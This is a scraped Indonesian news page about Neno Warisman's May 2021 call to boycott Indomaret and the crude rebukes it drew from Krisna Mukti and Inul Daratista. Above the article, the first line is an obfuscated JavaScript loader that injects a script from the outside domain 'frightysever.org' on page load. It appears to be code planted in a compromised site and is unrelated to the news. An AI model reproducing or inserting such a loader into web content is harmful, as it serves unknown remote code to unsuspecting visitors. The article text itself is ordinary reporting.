(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
selebriti

Neno Warisman Ajak Boikot Indomaret, Krisna Mukti : Otaknya Kejedot Kampret, Kena Sentil Inul


KANALKALIMANTAN.COM – Neno Wariswan lagi-lagi membuat publik bereaksi usai menyerukan ajakan boikot Indomaret. Seruan politikus Partai Ummat itu memancing amarah publik di media sosial.

Beragam tanggapan sinis disampaikan oleh warganet, tak terkecuali dari kalangan pesohor yang aktif di media sosial seperti Krisna Mukti.

Krisna Mukti bereaksi setelah mengetahui adanya ajakan boikot belanja di Indomaret. Dia menyayangkan ajakan itu. Apalagi, Krisna Mukti mengaku dahulu sempat mengidolakan atau ngefans dengan Neno Warisman.

Tetapi dia kini berubah haluan dan justru mengkritik keras ajakan Neno Warisman boikot Indomaret sembari menuliskan sindiran menohok.

“Dulu gue ngefans sama perempuan ini, tapi sejak otaknya kejedot kampret, jadi gak resep lagi dan lihatnya…Pingin gue masak jadi paniki,” kata Krisna Mukti.

Pernyataan Neno Warisman
Neno Warisman ajak boikot Indomaret berawal ketika dia melihat aksi buruh protes, buntut perseteruan antara PT Indomarco Prismatama (Indomaret Group) dengan karyawannya terkait THR.

Terkait hal itu, Neno Warisman mengaku tertarik terlibat dalam aksi boikot Indomaret. Dia beranggapan dukungan ini sebagai bentuk kesetiaan terhadap aspirasi masyarakat.

“Melanjutkan kesetiaan kita kepada aspirasi masyarakat, kalau masyarakat diwakili hari ini oleh kelompok KSPI yang mereka boikot Indomaret, belanja di warung sendiri,” kata Neno Warisman dalam YouTube-nya Selasa (25/5/2021).

Tak hanya itu, Neno Warisman menilai keterlibatannya dalam aksi boikot sebagai support terhadap pelaku UMKM dan pemilik tokok kelontong.

Meski mendukung, dia tak mempersoalkan kalau ada masyarakat yang tak sepaham dengannya.

“Ya sudah, yuk kita ikutan. Yang gak mau ikut juga gak apa-apa. Tapi, kalau mau ikut bagus! Karena kita belanjanya lebih ke warung sendiri,” serunya.

Disentil Inul Darastista
Selain Krisna Mukti, ajakan Neno Warisman boikot Indomaret mendapat sorotan tajam dari pedangdut Inul Daratista.

Pelantun Buaya Buntung itu menganggap Neno Warisman tak memikirkan dampak atas aksi boikot tersebut, apalagi pandemi Covid-19. Dia menilai ajakan Neno tak masuk akal sehingga memberikan sindiran telak.

“Kalau tidak suka dengan sudut pandang dan kinerja pemerintah silahkan anda hengkang dari negara ini enggak apa kok. Perempuan hebat itu bukan seperti anda yang bisanya mbacot mulu, ini arena covid sedunia anda mau ngajak demo,” ucap Inul Daratista.

“Anda belum pernah merasakan kena covid ya? Dampaknya juga selain enggak bisa kerja, taruhane nyawa. Saya dan keluarga sudah kena cuk! Sakit, itu suruh demo, toko tutup, terus pegawainya apa kamu tanggungjawab kasih makan cuk? Nalarmu nang endi? Hina dina anda ini,” tandasnya. (Suara.com)

Editor : kk


Al Ghifari

Recent Posts

Pendampingan Penyusunan Risk Register SKPD Pemkab HSU

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten (Pemkab) Hulu Sungai Utara (HSU) terus berupaya memberikan pendampingan penyusunan… Read More

38 menit ago

DKUMPP Banjar Launching Tiga Inovasi

KANALKALIMANTAN.COM, MARTAPURA - Ada tiga inovasi Tahun 2024 Dinas Koperasi Usaha Mikro Perindustrian dan Perdagangan… Read More

51 menit ago

Pasrah Kios Dibongkar, Bangunan Liar di Atas Sungai Ditertibkan Satpol PP

KANALKALIMANTAN.COM, BANJARMASIN - Satpol PP Kota Banjarmasin kembali melakukan pembongkaran bangunan tanpa izin yang berdiri… Read More

1 jam ago

Hadiri Harlah Sanggar Ar Rumi, Nurgita Tiyas Soroti Pentingnya Partisipasi Politik Mahasiswa

KANALKALIMANTAN.COM, MARTAPURA - TP PKK Kabupaten Banjar Hj Nurgita Tiyas diundang menjadi pembicara dalam rangkaian… Read More

1 jam ago

RCTI Premium Sports: Sepakbola Bergengsi 2024 “Derbi Serumpun” 4 Klub Indonesia Malaysia

KANALKALIMANTAN.COM - Untuk kali pertama RCTI mempersembahkan event Sepakbola Bergensi 2024 dengan nama RCTI Premium Sports.… Read More

1 jam ago

Dukung Peningkatan Kompetensi Wartawan, PLN Gandeng PWI Kalteng Gelar UKW

KANALKALIMANTAN.COM, PALANGKARAYA - Upaya mendukung peningkatan kompetensi wartawan dalam menjalankan tugas jurnalistik, PT PLN (Persero)… Read More

2 jam ago

This website uses cookies.